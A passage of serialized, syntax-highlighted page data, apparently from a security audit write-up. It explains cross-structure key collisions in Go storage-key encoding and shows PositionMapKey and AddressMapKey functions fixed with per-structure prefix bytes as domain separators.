props":94092,"children":94093},{"style":238},[94094],{"type":33,"value":1424},{"type":27,"tag":207,"props":94096,"children":94097},{"class":209,"line":8029},[94098,94102,94106,94110],{"type":27,"tag":207,"props":94099,"children":94100},{"style":220},[94101],{"type":33,"value":93084},{"type":27,"tag":207,"props":94103,"children":94104},{"style":226},[94105],{"type":33,"value":83648},{"type":27,"tag":207,"props":94107,"children":94108},{"style":1335},[94109],{"type":33,"value":92787},{"type":27,"tag":207,"props":94111,"children":94112},{"style":238},[94113],{"type":33,"value":9090},{"type":27,"tag":207,"props":94115,"children":94116},{"class":209,"line":8037},[94117,94121,94125],{"type":27,"tag":207,"props":94118,"children":94119},{"style":238},[94120],{"type":33,"value":93677},{"type":27,"tag":207,"props":94122,"children":94123},{"style":8920},[94124],{"type":33,"value":91988},{"type":27,"tag":207,"props":94126,"children":94127},{"style":238},[94128],{"type":33,"value":1842},{"type":27,"tag":207,"props":94130,"children":94131},{"class":209,"line":8046},[94132,94136,94140,94144,94148,94152,94156,94160],{"type":27,"tag":207,"props":94133,"children":94134},{"style":220},[94135],{"type":33,"value":93693},{"type":27,"tag":207,"props":94137,"children":94138},{"style":238},[94139],{"type":33,"value":1041},{"type":27,"tag":207,"props":94141,"children":94142},{"style":1335},[94143],{"type":33,"value":92824},{"type":27,"tag":207,"props":94145,"children":94146},{"style":238},[94147],{"type":33,"value":1343},{"type":27,"tag":207,"props":94149,"children":94150},{"style":1335},[94151],{"type":33,"value":16416},{"type":27,"tag":207,"props":94153,"children":94154},{"style":238},[94155],{"type":33,"value":1343},{"type":27,"tag":207,"props":94157,"children":94158},{"style":220},[94159],{"type":33,"value":92694},{"type":27,"tag":207,"props":94161,"children":94162},{"style":238},[94163],{"type":33,"value":92845},{"type":27,"tag":207,"props":94165,"children":94166},{"class":209,"line":8055},[94167],{"type":27,"tag":207,"props":94168,"children":94169},{"style":238},[94170],{"type":33,"value":31184},{"type":27,"tag":207,"props":94172,"children":94173},{"class":209,"line":8064},[94174,94178,94182,94186,94190,94194,94198,94202],{"type":27,"tag":207,"props":94175,"children":94176},{"style":220},[94177],{"type":33,"value":92815},{"type":27,"tag":207,"props":94179,"children":94180},{"style":238},[94181],{"type":33,"value":1041},{"type":27,"tag":207,"props":94183,"children":94184},{"style":1335},[94185],{"type":33,"value":92869},{"type":27,"tag":207,"props":94187,"children":94188},{"style":238},[94189],{"type":33,"value":1343},{"type":27,"tag":207,"props":94191,"children":94192},{"style":220},[94193],{"type":33,"value":92778},{"type":27,"tag":207,"props":94195,"children":94196},{"style":238},[94197],{"type":33,"value":1123},{"type":27,"tag":207,"props":94199,"children":94200},{"style":220},[94201],{"type":33,"value":92694},{"type":27,"tag":207,"props":94203,"children":94204},{"style":238},[94205],{"type":33,"value":10449},{"type":27,"tag":207,"props":94207,"children":94208},{"class":209,"line":8072},[94209],{"type":27,"tag":207,"props":94210,"children":94211},{"emptyLinePlaceholder":19},[94212],{"type":33,"value":2062},{"type":27,"tag":207,"props":94214,"children":94215},{"class":209,"line":8081},[94216,94221,94225,94229],{"type":27,"tag":207,"props":94217,"children":94218},{"style":220},[94219],{"type":33,"value":94220}," addressNameEncoded",{"type":27,"tag":207,"props":94222,"children":94223},{"style":226},[94224],{"type":33,"value":83648},{"type":27,"tag":207,"props":94226,"children":94227},{"style":1335},[94228],{"type":33,"value":92787},{"type":27,"tag":207,"props":94230,"children":94231},{"style":238},[94232],{"type":33,"value":9090},{"type":27,"tag":207,"props":94234,"children":94235},{"class":209,"line":8090},[94236,94240,94244],{"type":27,"tag":207,"props":94237,"children":94238},{"style":238},[94239],{"type":33,"value":93677},{"type":27,"tag":207,"props":94241,"children":94242},{"style":8920},[94243],{"type":33,"value":91988},{"type":27,"tag":207,"props":94245,"children":94246},{"style":238},[94247],{"type":33,"value":1842},{"type":27,"tag":207,"props":94249,"children":94250},{"class":209,"line":8098},[94251,94255,94259,94263,94267,94271,94275,94279],{"type":27,"tag":207,"props":94252,"children":94253},{"style":220},[94254],{"type":33,"value":93693},{"type":27,"tag":207,"props":94256,"children":94257},{"style":238},[94258],{"type":33,"value":1041},{"type":27,"tag":207,"props":94260,"children":94261},{"style":1335},[94262],{"type":33,"value":92824},{"type":27,"tag":207,"props":94264,"children":94265},{"style":238},[94266],{"type":33,"value":1343},{"type":27,"tag":207,"props":94268,"children":94269},{"style":1335},[94270],{"type":33,"value":16416},{"type":27,"tag":207,"props":94272,"children":94273},{"style":238},[94274],{"type":33,"value":1343},{"type":27,"tag":207,"props":94276,"children":94277},{"style":220},[94278],{"type":33,"value":94063},{"type":27,"tag":207,"props":94280,"children":94281},{"style":238},[94282],{"type":33,"value":92845},{"type":27,"tag":207,"props":94284,"children":94285},{"class":209,"line":8107},[94286],{"type":27,"tag":207,"props":94287,"children":94288},{"style":238},[94289],{"type":33,"value":31184},{"type":27,"tag":207,"props":94291,"children":94292},{"class":209,"line":8116},[94293,94297,94301,94305,94309,94314,94318,94322],{"type":27,"tag":207,"props":94294,"children":94295},{"style":220},[94296],{"type":33,"value":92815},{"type":27,"tag":207,"props":94298,"children":94299},{"style":238},[94300],{"type":33,"value":1041},{"type":27,"tag":207,"props":94302,"children":94303},{"style":1335},[94304],{"type":33,"value":92869},{"type":27,"tag":207,"props":94306,"children":94307},{"style":238},[94308],{"type":33,"value":1343},{"type":27,"tag":207,"props":94310,"children":94311},{"style":220},[94312],{"type":33,"value":94313},"addressNameEncoded",{"type":27,"tag":207,"props":94315,"children":94316},{"style":238},[94317],{"type":33,"value":1123},{"type":27,"tag":207,"props":94319,"children":94320},{"style":220},[94321],{"type":33,"value":94063},{"type":27,"tag":207,"props":94323,"children":94324},{"style":238},[94325],{"type":33,"value":10449},{"type":27,"tag":207,"props":94327,"children":94328},{"class":209,"line":8125},[94329],{"type":27,"tag":207,"props":94330,"children":94331},{"emptyLinePlaceholder":19},[94332],{"type":33,"value":2062},{"type":27,"tag":207,"props":94334,"children":94335},{"class":209,"line":8133},[94336,94340,94344,94348,94352,94356],{"type":27,"tag":207,"props":94337,"children":94338},{"style":220},[94339],{"type":33,"value":93897},{"type":27,"tag":207,"props":94341,"children":94342},{"style":226},[94343],{"type":33,"value":83648},{"type":27,"tag":207,"props":94345,"children":94346},{"style":220},[94347],{"type":33,"value":89457},{"type":27,"tag":207,"props":94349,"children":94350},{"style":238},[94351],{"type":33,"value":1041},{"type":27,"tag":207,"props":94353,"children":94354},{"style":1335},[94355],{"type":33,"value":92446},{"type":27,"tag":207,"props":94357,"children":94358},{"style":238},[94359],{"type":33,"value":9090},{"type":27,"tag":207,"props":94361,"children":94362},{"class":209,"line":8142},[94363,94367],{"type":27,"tag":207,"props":94364,"children":94365},{"style":1325},[94366],{"type":33,"value":93925},{"type":27,"tag":207,"props":94368,"children":94369},{"style":238},[94370],{"type":33,"value":1842},{"type":27,"tag":207,"props":94372,"children":94373},{"class":209,"line":8151},[94374,94378],{"type":27,"tag":207,"props":94375,"children":94376},{"style":220},[94377],{"type":33,"value":93937},{"type":27,"tag":207,"props":94379,"children":94380},{"style":238},[94381],{"type":33,"value":1842},{"type":27,"tag":207,"props":94383,"children":94384},{"class":209,"line":8160},[94385,94389],{"type":27,"tag":207,"props":94386,"children":94387},{"style":220},[94388],{"type":33,"value":93949},{"type":27,"tag":207,"props":94390,"children":94391},{"style":238},[94392],{"type":33,"value":1842},{"type":27,"tag":207,"props":94394,"children":94395},{"class":209,"line":8169},[94396,94400],{"type":27,"tag":207,"props":94397,"children":94398},{"style":220},[94399],{"type":33,"value":93961},{"type":27,"tag":207,"props":94401,"children":94402},{"style":238},[94403],{"type":33,"value":1842},{"type":27,"tag":207,"props":94405,"children":94406},{"class":209,"line":8177},[94407,94411],{"type":27,"tag":207,"props":94408,"children":94409},{"style":220},[94410],{"type":33,"value":93949},{"type":27,"tag":207,"props":94412,"children":94413},{"style":238},[94414],{"type":33,"value":1842},{"type":27,"tag":207,"props":94416,"children":94417},{"class":209,"line":8185},[94418,94423],{"type":27,"tag":207,"props":94419,"children":94420},{"style":220},[94421],{"type":33,"value":94422}," addressNameEncoded",{"type":27,"tag":207,"props":94424,"children":94425},{"style":238},[94426],{"type":33,"value":1842},{"type":27,"tag":207,"props":94428,"children":94429},{"class":209,"line":8194},[94430],{"type":27,"tag":207,"props":94431,"children":94432},{"style":238},[94433],{"type":33,"value":31184},{"type":27,"tag":207,"props":94435,"children":94436},{"class":209,"line":9933},[94437],{"type":27,"tag":207,"props":94438,"children":94439},{"style":238},[94440],{"type":33,"value":451},{"type":27,"tag":36,"props":94442,"children":94443},{},[94444,94446,94451],{"type":33,"value":94445},"Unfortunately, when dealing with more than one storage entry within the same ",{"type":27,"tag":84,"props":94447,"children":94449},{"className":94448},[],[94450],{"type":33,"value":92200},{"type":33,"value":94452},", the previous implementation is not enough to guarantee key uniqueness. While it still effectively prevents key collisions within each individual structure, it does not prevent cross-structure key collisions.",{"type":27,"tag":101,"props":94454,"children":94456},{"code":94455},"vaultId = 1, username = \"a\", positionName = \"b\"\n => PositionMapKey = \"1|a|b\"\n\nvaultId = 1, username = \"a\", addressName = \"b\"\n => AddressMapKey = \"1|a||b\"\n",[94457],{"type":27,"tag":84,"props":94458,"children":94459},{"__ignoreMap":7},[94460],{"type":33,"value":94455},{"type":27,"tag":36,"props":94462,"children":94463},{},[94464],{"type":33,"value":94465},"To prevent this, add a structure-specific prefix to the start of each key to act as a domain separator.",{"type":27,"tag":101,"props":94467,"children":94469},{"code":94468,"language":83397,"meta":7,"className":83398,"style":7},"const (\n Seperator = \"|\"\n PositionMapPrefix = \"\\x01\"\n AddressMapPrefix = \"\\x02\"\n)\n\n\nfunc PositionMapKey(\n vaultId uint64,\n username, positionName []byte,\n) (key []byte) {\n usernameEncoded := make(\n []byte,\n hex.EncodedLen(len(username)),\n )\n hex.Encode(usernameEncoded, username)\n\n positionNameEncoded := make(\n []byte,\n hex.EncodedLen(len(positionName)),\n )\n hex.Encode(positionNameEncoded, positionName)\n\n key := fmt.Sprintf(\n \"%s%d%s%s%s%s\",\n PositionMapPrefix,\n vaultId,\n Seperator,\n usernameEncoded,\n Seperator,\n positionNameEncoded,\n )\n}\n\n\nfunc AddressMapKey(\n vaultId uint64,\n username, addressName []byte,\n) (key []byte) {\n usernameEncoded := make(\n []byte,\n hex.EncodedLen(len(username)),\n )\n hex.Encode(usernameEncoded, username)\n\n addressNameEncoded := make(\n []byte,\n hex.EncodedLen(len(addressName)),\n )\n hex.Encode(addressNameEncoded, addressName)\n\n key := fmt.Sprintf(\n \"%s%d%s%s%s%s\",\n AddressMapPrefix,\n vaultId,\n Seperator,\n usernameEncoded,\n Seperator,\n addressNameEncoded,\n )\n}\n",[94470],{"type":27,"tag":84,"props":94471,"children":94472},{"__ignoreMap":7},[94473,94484,94499,94526,94551,94558,94565,94572,94587,94602,94629,94652,94671,94686,94721,94728,94763,94770,94789,94804,94839,94846,94881,94888,94915,94927,94939,94950,94961,94972,94983,94994,95001,95008,95015,95022,95037,95052,95079,95102,95121,95136,95171,95178,95213,95220,95239,95254,95289,95296,95331,95338,95365,95376,95388,95399,95410,95421,95432,95443,95450],{"type":27,"tag":207,"props":94474,"children":94475},{"class":209,"line":210},[94476,94480],{"type":27,"tag":207,"props":94477,"children":94478},{"style":214},[94479],{"type":33,"value":16931},{"type":27,"tag":207,"props":94481,"children":94482},{"style":238},[94483],{"type":33,"value":85797},{"type":27,"tag":207,"props":94485,"children":94486},{"class":209,"line":244},[94487,94491,94495],{"type":27,"tag":207,"props":94488,"children":94489},{"style":220},[94490],{"type":33,"value":92554},{"type":27,"tag":207,"props":94492,"children":94493},{"style":226},[94494],{"type":33,"value":229},{"type":27,"tag":207,"props":94496,"children":94497},{"style":1325},[94498],{"type":33,"value":92563},{"type":27,"tag":207,"props":94500,"children":94501},{"class":209,"line":270},[94502,94507,94511,94516,94521],{"type":27,"tag":207,"props":94503,"children":94504},{"style":220},[94505],{"type":33,"value":94506}," PositionMapPrefix",{"type":27,"tag":207,"props":94508,"children":94509},{"style":226},[94510],{"type":33,"value":229},{"type":27,"tag":207,"props":94512,"children":94513},{"style":1325},[94514],{"type":33,"value":94515}," \"",{"type":27,"tag":207,"props":94517,"children":94518},{"style":55613},[94519],{"type":33,"value":94520},"\\x01",{"type":27,"tag":207,"props":94522,"children":94523},{"style":1325},[94524],{"type":33,"value":94525},"\"\n",{"type":27,"tag":207,"props":94527,"children":94528},{"class":209,"line":296},[94529,94534,94538,94542,94547],{"type":27,"tag":207,"props":94530,"children":94531},{"style":220},[94532],{"type":33,"value":94533}," AddressMapPrefix",{"type":27,"tag":207,"props":94535,"children":94536},{"style":226},[94537],{"type":33,"value":229},{"type":27,"tag":207,"props":94539,"children":94540},{"style":1325},[94541],{"type":33,"value":94515},{"type":27,"tag":207,"props":94543,"children":94544},{"style":55613},[94545],{"type":33,"value":94546},"\\x02",{"type":27,"tag":207,"props":94548,"children":94549},{"style":1325},[94550],{"type":33,"value":94525},{"type":27,"tag":207,"props":94552,"children":94553},{"class":209,"line":445},[94554],{"type":27,"tag":207,"props":94555,"children":94556},{"style":238},[94557],{"type":33,"value":10449},{"type":27,"tag":207,"props":94559,"children":94560},{"class":209,"line":867},[94561],{"type":27,"tag":207,"props":94562,"children":94563},{"emptyLinePlaceholder":19},[94564],{"type":33,"value":2062},{"type":27,"tag":207,"props":94566,"children":94567},{"class":209,"line":892},[94568],{"type":27,"tag":207,"props":94569,"children":94570},{"emptyLinePlaceholder":19},[94571],{"type":33,"value":2062},{"type":27,"tag":207,"props":94573,"children":94574},{"class":209,"line":1475},[94575,94579,94583],{"type":27,"tag":207,"props":94576,"children":94577},{"style":214},[94578],{"type":33,"value":2085},{"type":27,"tag":207,"props":94580,"children":94581},{"style":1335},[94582],{"type":33,"value":93581},{"type":27,"tag":207,"props":94584,"children":94585},{"style":238},[94586],{"type":33,"value":9090},{"type":27,"tag":207,"props":94588,"children":94589},{"class":209,"line":2065},[94590,94594,94598],{"type":27,"tag":207,"props":94591,"children":94592},{"style":220},[94593],{"type":33,"value":92470},{"type":27,"tag":207,"props":94595,"children":94596},{"style":8920},[94597],{"type":33,"value":83653},{"type":27,"tag":207,"props":94599,"children":94600},{"style":238},[94601],{"type":33,"value":1842},{"type":27,"tag":207,"props":94603,"children":94604},{"class":209,"line":2092},[94605,94609,94613,94617,94621,94625],{"type":27,"tag":207,"props":94606,"children":94607},{"style":220},[94608],{"type":33,"value":92482},{"type":27,"tag":207,"props":94610,"children":94611},{"style":238},[94612],{"type":33,"value":1123},{"type":27,"tag":207,"props":94614,"children":94615},{"style":220},[94616],{"type":33,"value":92963},{"type":27,"tag":207,"props":94618,"children":94619},{"style":238},[94620],{"type":33,"value":83460},{"type":27,"tag":207,"props":94622,"children":94623},{"style":8920},[94624],{"type":33,"value":91988},{"type":27,"tag":207,"props":94626,"children":94627},{"style":238},[94628],{"type":33,"value":1842},{"type":27,"tag":207,"props":94630,"children":94631},{"class":209,"line":2130},[94632,94636,94640,94644,94648],{"type":27,"tag":207,"props":94633,"children":94634},{"style":238},[94635],{"type":33,"value":83614},{"type":27,"tag":207,"props":94637,"children":94638},{"style":220},[94639],{"type":33,"value":79387},{"type":27,"tag":207,"props":94641,"children":94642},{"style":238},[94643],{"type":33,"value":83460},{"type":27,"tag":207,"props":94645,"children":94646},{"style":8920},[94647],{"type":33,"value":91988},{"type":27,"tag":207,"props":94649,"children":94650},{"style":238},[94651],{"type":33,"value":1424},{"type":27,"tag":207,"props":94653,"children":94654},{"class":209,"line":2168},[94655,94659,94663,94667],{"type":27,"tag":207,"props":94656,"children":94657},{"style":220},[94658],{"type":33,"value":93084},{"type":27,"tag":207,"props":94660,"children":94661},{"style":226},[94662],{"type":33,"value":83648},{"type":27,"tag":207,"props":94664,"children":94665},{"style":1335},[94666],{"type":33,"value":92787},{"type":27,"tag":207,"props":94668,"children":94669},{"style":238},[94670],{"type":33,"value":9090},{"type":27,"tag":207,"props":94672,"children":94673},{"class":209,"line":4095},[94674,94678,94682],{"type":27,"tag":207,"props":94675,"children":94676},{"style":238},[94677],{"type":33,"value":93677},{"type":27,"tag":207,"props":94679,"children":94680},{"style":8920},[94681],{"type":33,"value":91988},{"type":27,"tag":207,"props":94683,"children":94684},{"style":238},[94685],{"type":33,"value":1842},{"type":27,"tag":207,"props":94687,"children":94688},{"class":209,"line":4103},[94689,94693,94697,94701,94705,94709,94713,94717],{"type":27,"tag":207,"props":94690,"children":94691},{"style":220},[94692],{"type":33,"value":93693},{"type":27,"tag":207,"props":94694,"children":94695},{"style":238},[94696],{"type":33,"value":1041},{"type":27,"tag":207,"props":94698,"children":94699},{"style":1335},[94700],{"type":33,"value":92824},{"type":27,"tag":207,"props":94702,"children":94703},{"style":238},[94704],{"type":33,"value":1343},{"type":27,"tag":207,"props":94706,"children":94707},{"style":1335},[94708],{"type":33,"value":16416},{"type":27,"tag":207,"props":94710,"children":94711},{"style":238},[94712],{"type":33,"value":1343},{"type":27,"tag":207,"props":94714,"children":94715},{"style":220},[94716],{"type":33,"value":92694},{"type":27,"tag":207,"props":94718,"children":94719},{"style":238},[94720],{"type":33,"value":92845},{"type":27,"tag":207,"props":94722,"children":94723},{"class":209,"line":4154},[94724],{"type":27,"tag":207,"props":94725,"children":94726},{"style":238},[94727],{"type":33,"value":31184},{"type":27,"tag":207,"props":94729,"children":94730},{"class":209,"line":4203},[94731,94735,94739,94743,94747,94751,94755,94759],{"type":27,"tag":207,"props":94732,"children":94733},{"style":220},[94734],{"type":33,"value":92815},{"type":27,"tag":207,"props":94736,"children":94737},{"style":238},[94738],{"type":33,"value":1041},{"type":27,"tag":207,"props":94740,"children":94741},{"style":1335},[94742],{"type":33,"value":92869},{"type":27,"tag":207,"props":94744,"children":94745},{"style":238},[94746],{"type":33,"value":1343},{"type":27,"tag":207,"props":94748,"children":94749},{"style":220},[94750],{"type":33,"value":92778},{"type":27,"tag":207,"props":94752,"children":94753},{"style":238},[94754],{"type":33,"value":1123},{"type":27,"tag":207,"props":94756,"children":94757},{"style":220},[94758],{"type":33,"value":92694},{"type":27,"tag":207,"props":94760,"children":94761},{"style":238},[94762],{"type":33,"value":10449},{"type":27,"tag":207,"props":94764,"children":94765},{"class":209,"line":4249},[94766],{"type":27,"tag":207,"props":94767,"children":94768},{"emptyLinePlaceholder":19},[94769],{"type":33,"value":2062},{"type":27,"tag":207,"props":94771,"children":94772},{"class":209,"line":4290},[94773,94777,94781,94785],{"type":27,"tag":207,"props":94774,"children":94775},{"style":220},[94776],{"type":33,"value":93778},{"type":27,"tag":207,"props":94778,"children":94779},{"style":226},[94780],{"type":33,"value":83648},{"type":27,"tag":207,"props":94782,"children":94783},{"style":1335},[94784],{"type":33,"value":92787},{"type":27,"tag":207,"props":94786,"children":94787},{"style":238},[94788],{"type":33,"value":9090},{"type":27,"tag":207,"props":94790,"children":94791},{"class":209,"line":4304},[94792,94796,94800],{"type":27,"tag":207,"props":94793,"children":94794},{"style":238},[94795],{"type":33,"value":93677},{"type":27,"tag":207,"props":94797,"children":94798},{"style":8920},[94799],{"type":33,"value":91988},{"type":27,"tag":207,"props":94801,"children":94802},{"style":238},[94803],{"type":33,"value":1842},{"type":27,"tag":207,"props":94805,"children":94806},{"class":209,"line":5466},[94807,94811,94815,94819,94823,94827,94831,94835],{"type":27,"tag":207,"props":94808,"children":94809},{"style":220},[94810],{"type":33,"value":93693},{"type":27,"tag":207,"props":94812,"children":94813},{"style":238},[94814],{"type":33,"value":1041},{"type":27,"tag":207,"props":94816,"children":94817},{"style":1335},[94818],{"type":33,"value":92824},{"type":27,"tag":207,"props":94820,"children":94821},{"style":238},[94822],{"type":33,"value":1343},{"type":27,"tag":207,"props":94824,"children":94825},{"style":1335},[94826],{"type":33,"value":16416},{"type":27,"tag":207,"props":94828,"children":94829},{"style":238},[94830],{"type":33,"value":1343},{"type":27,"tag":207,"props":94832,"children":94833},{"style":220},[94834],{"type":33,"value":92963},{"type":27,"tag":207,"props":94836,"children":94837},{"style":238},[94838],{"type":33,"value":92845},{"type":27,"tag":207,"props":94840,"children":94841},{"class":209,"line":5530},[94842],{"type":27,"tag":207,"props":94843,"children":94844},{"style":238},[94845],{"type":33,"value":31184},{"type":27,"tag":207,"props":94847,"children":94848},{"class":209,"line":7900},[94849,94853,94857,94861,94865,94869,94873,94877],{"type":27,"tag":207,"props":94850,"children":94851},{"style":220},[94852],{"type":33,"value":92815},{"type":27,"tag":207,"props":94854,"children":94855},{"style":238},[94856],{"type":33,"value":1041},{"type":27,"tag":207,"props":94858,"children":94859},{"style":1335},[94860],{"type":33,"value":92869},{"type":27,"tag":207,"props":94862,"children":94863},{"style":238},[94864],{"type":33,"value":1343},{"type":27,"tag":207,"props":94866,"children":94867},{"style":220},[94868],{"type":33,"value":92904},{"type":27,"tag":207,"props":94870,"children":94871},{"style":238},[94872],{"type":33,"value":1123},{"type":27,"tag":207,"props":94874,"children":94875},{"style":220},[94876],{"type":33,"value":92963},{"type":27,"tag":207,"props":94878,"children":94879},{"style":238},[94880],{"type":33,"value":10449},{"type":27,"tag":207,"props":94882,"children":94883},{"class":209,"line":7909},[94884],{"type":27,"tag":207,"props":94885,"children":94886},{"emptyLinePlaceholder":19},[94887],{"type":33,"value":2062},{"type":27,"tag":207,"props":94889,"children":94890},{"class":209,"line":7917},[94891,94895,94899,94903,94907,94911],{"type":27,"tag":207,"props":94892,"children":94893},{"style":220},[94894],{"type":33,"value":93897},{"type":27,"tag":207,"props":94896,"children":94897},{"style":226},[94898],{"type":33,"value":83648},{"type":27,"tag":207,"props":94900,"children":94901},{"style":220},[94902],{"type":33,"value":89457},{"type":27,"tag":207,"props":94904,"children":94905},{"style":238},[94906],{"type":33,"value":1041},{"type":27,"tag":207,"props":94908,"children":94909},{"style":1335},[94910],{"type":33,"value":92446},{"type":27,"tag":207,"props":94912,"children":94913},{"style":238},[94914],{"type":33,"value":9090},{"type":27,"tag":207,"props":94916,"children":94917},{"class":209,"line":7926},[94918,94923],{"type":27,"tag":207,"props":94919,"children":94920},{"style":1325},[94921],{"type":33,"value":94922}," \"%s%d%s%s%s%s\"",{"type":27,"tag":207,"props":94924,"children":94925},{"style":238},[94926],{"type":33,"value":1842},{"type":27,"tag":207,"props":94928,"children":94929},{"class":209,"line":7934},[94930,94935],{"type":27,"tag":207,"props":94931,"children":94932},{"style":220},[94933],{"type":33,"value":94934}," PositionMapPrefix",{"type":27,"tag":207,"props":94936,"children":94937},{"style":238},[94938],{"type":33,"value":1842},{"type":27,"tag":207,"props":94940,"children":94941},{"class":209,"line":7943},[94942,94946],{"type":27,"tag":207,"props":94943,"children":94944},{"style":220},[94945],{"type":33,"value":93937},{"type":27,"tag":207,"props":94947,"children":94948},{"style":238},[94949],{"type":33,"value":1842},{"type":27,"tag":207,"props":94951,"children":94952},{"class":209,"line":7952},[94953,94957],{"type":27,"tag":207,"props":94954,"children":94955},{"style":220},[94956],{"type":33,"value":93949},{"type":27,"tag":207,"props":94958,"children":94959},{"style":238},[94960],{"type":33,"value":1842},{"type":27,"tag":207,"props":94962,"children":94963},{"class":209,"line":7961},[94964,94968],{"type":27,"tag":207,"props":94965,"children":94966},{"style":220},[94967],{"type":33,"value":93961},{"type":27,"tag":207,"props":94969,"children":94970},{"style":238},[94971],{"type":33,"value":1842},{"type":27,"tag":207,"props":94973,"children":94974},{"class":209,"line":7969},[94975,94979],{"type":27,"tag":207,"props":94976,"children":94977},{"style":220},[94978],{"type":33,"value":93949},{"type":27,"tag":207,"props":94980,"children":94981},{"style":238},[94982],{"type":33,"value":1842},{"type":27,"tag":207,"props":94984,"children":94985},{"class":209,"line":7978},[94986,94990],{"type":27,"tag":207,"props":94987,"children":94988},{"style":220},[94989],{"type":33,"value":93984},{"type":27,"tag":207,"props":94991,"children":94992},{"style":238},[94993],{"type":33,"value":1842},{"type":27,"tag":207,"props":94995,"children":94996},{"class":209,"line":7987},[94997],{"type":27,"tag":207,"props":94998,"children":94999},{"style":238},[95000],{"type":33,"value":31184},{"type":27,"tag":207,"props":95002,"children":95003},{"class":209,"line":7996},[95004],{"type":27,"tag":207,"props":95005,"children":95006},{"style":238},[95007],{"type":33,"value":451},{"type":27,"tag":207,"props":95009,"children":95010},{"class":209,"line":8005},[95011],{"type":27,"tag":207,"props":95012,"children":95013},{"emptyLinePlaceholder":19},[95014],{"type":33,"value":2062},{"type":27,"tag":207,"props":95016,"children":95017},{"class":209,"line":8013},[95018],{"type":27,"tag":207,"props":95019,"children":95020},{"emptyLinePlaceholder":19},[95021],{"type":33,"value":2062},{"type":27,"tag":207,"props":95023,"children":95024},{"class":209,"line":8021},[95025,95029,95033],{"type":27,"tag":207,"props":95026,"children":95027},{"style":214},[95028],{"type":33,"value":2085},{"type":27,"tag":207,"props":95030,"children":95031},{"style":1335},[95032],{"type":33,"value":94028},{"type":27,"tag":207,"props":95034,"children":95035},{"style":238},[95036],{"type":33,"value":9090},{"type":27,"tag":207,"props":95038,"children":95039},{"class":209,"line":8029},[95040,95044,95048],{"type":27,"tag":207,"props":95041,"children":95042},{"style":220},[95043],{"type":33,"value":92470},{"type":27,"tag":207,"props":95045,"children":95046},{"style":8920},[95047],{"type":33,"value":83653},{"type":27,"tag":207,"props":95049,"children":95050},{"style":238},[95051],{"type":33,"value":1842},{"type":27,"tag":207,"props":95053,"children":95054},{"class":209,"line":8037},[95055,95059,95063,95067,95071,95075],{"type":27,"tag":207,"props":95056,"children":95057},{"style":220},[95058],{"type":33,"value":92482},{"type":27,"tag":207,"props":95060,"children":95061},{"style":238},[95062],{"type":33,"value":1123},{"type":27,"tag":207,"props":95064,"children":95065},{"style":220},[95066],{"type":33,"value":94063},{"type":27,"tag":207,"props":95068,"children":95069},{"style":238},[95070],{"type":33,"value":83460},{"type":27,"tag":207,"props":95072,"children":95073},{"style":8920},[95074],{"type":33,"value":91988},{"type":27,"tag":207,"props":95076,"children":95077},{"style":238},[95078],{"type":33,"value":1842},{"type":27,"tag":207,"props":95080,"children":95081},{"class":209,"line":8046},[95082,95086,95090,95094,95098],{"type":27,"tag":207,"props":95083,"children":95084},{"style":238},[95085],{"type":33,"value":83614},{"type":27,"tag":207,"props":95087,"children":95088},{"style":220},[95089],{"type":33,"value":79387},{"type":27,"tag":207,"props":95091,"children":95092},{"style":238},[95093],{"type":33,"value":83460},{"type":27,"tag":207,"props":95095,"children":95096},{"style":8920},[95097],{"type":33,"value":91988},{"type":27,"tag":207,"props":95099,"children":95100},{"style":238},[95101],{"type":33,"value":1424},{"type":27,"tag":207,"props":95103,"children":95104},{"class":209,"line":8055},[95105,95109,95113,95117],{"type":27,"tag":207,"props":95106,"children":95107},{"style":220},[95108],{"type":33,"value":93084},{"type":27,"tag":207,"props":95110,"children":95111},{"style":226},[95112],{"type":33,"value":83648},{"type":27,"tag":207,"props":95114,"children":95115},{"style":1335},[95116],{"type":33,"value":92787},{"type":27,"tag":207,"props":95118,"children":95119},{"style":238},[95120],{"type":33,"value":9090},{"type":27,"tag":207,"props":95122,"children":95123},{"class":209,"line":8064},[95124,95128,95132],{"type":27,"tag":207,"props":95125,"children":95126},{"style":238},[95127],{"type":33,"value":93677},{"type":27,"tag":207,"props":95129,"children":95130},{"style":8920},[95131],{"type":33,"value":91988},{"type":27,"tag":207,"props":95133,"children":95134},{"style":238},[95135],{"type":33,"value":1842},{"type":27,"tag":207,"props":95137,"children":95138},{"class":209,"line":8072},[95139,95143,95147,95151,95155,95159,95163,95167],{"type":27,"tag":207,"props":95140,"children":95141},{"style":220},[95142],{"type":33,"value":93693},{"type":27,"tag":207,"props":95144,"children":95145},{"style":238},[95146],{"type":33,"value":1041},{"type":27,"tag":207,"props":95148,"children":95149},{"style":1335},[95150],{"type":33,"value":92824},{"type":27,"tag":207,"props":95152,"children":95153},{"style":238},[95154],{"type":33,"value":1343},{"type":27,"tag":207,"props":95156,"children":95157},{"style":1335},[95158],{"type":33,"value":16416},{"type":27,"tag":207,"props":95160,"children":95161},{"style":238},[95162],{"type":33,"value":1343},{"type":27,"tag":207,"props":95164,"children":95165},{"style":220},[95166],{"type":33,"value":92694},{"type":27,"tag":207,"props":95168,"children":95169},{"style":238},[95170],{"type":33,"value":92845},{"type":27,"tag":207,"props":95172,"children":95173},{"class":209,"line":8081},[95174],{"type":27,"tag":207,"props":95175,"children":95176},{"style":238},[95177],{"type":33,"value":31184},{"type":27,"tag":207,"props":95179,"children":95180},{"class":209,"line":8090},[95181,95185,95189,95193,95197,95201,95205,95209],{"type":27,"tag":207,"props":95182,"children":95183},{"style":220},[95184],{"type":33,"value":92815},{"type":27,"tag":207,"props":95186,"children":95187},{"style":238},[95188],{"type":33,"value":1041},{"type":27,"tag":207,"props":95190,"children":95191},{"style":1335},[95192],{"type":33,"value":92869},{"type":27,"tag":207,"props":95194,"children":95195},{"style":238},[95196],{"type":33,"value":1343},{"type":27,"tag":207,"props":95198,"children":95199},{"style":220},[95200],{"type":33,"value":92778},{"type":27,"tag":207,"props":95202,"children":95203},{"style":238},[95204],{"type":33,"value":1123},{"type":27,"tag":207,"props":95206,"children":95207},{"style":220},[95208],{"type":33,"value":92694},{"type":27,"tag":207,"props":95210,"children":95211},{"style":238},[95212],{"type":33,"value":10449},{"type":27,"tag":207,"props":95214,"children":95215},{"class":209,"line":8098},[95216],{"type":27,"tag":207,"props":95217,"children":95218},{"emptyLinePlaceholder":19},[95219],{"type":33,"value":2062},{"type":27,"tag":207,"props":95221,"children":95222},{"class":209,"line":8107},[95223,95227,95231,95235],{"type":27,"tag":207,"props":95224,"children":95225},{"style":220},[95226],{"type":33,"value":94220},{"type":27,"tag":207,"props":95228,"children":95229},{"style":226},[95230],{"type":33,"value":83648},{"type":27,"tag":20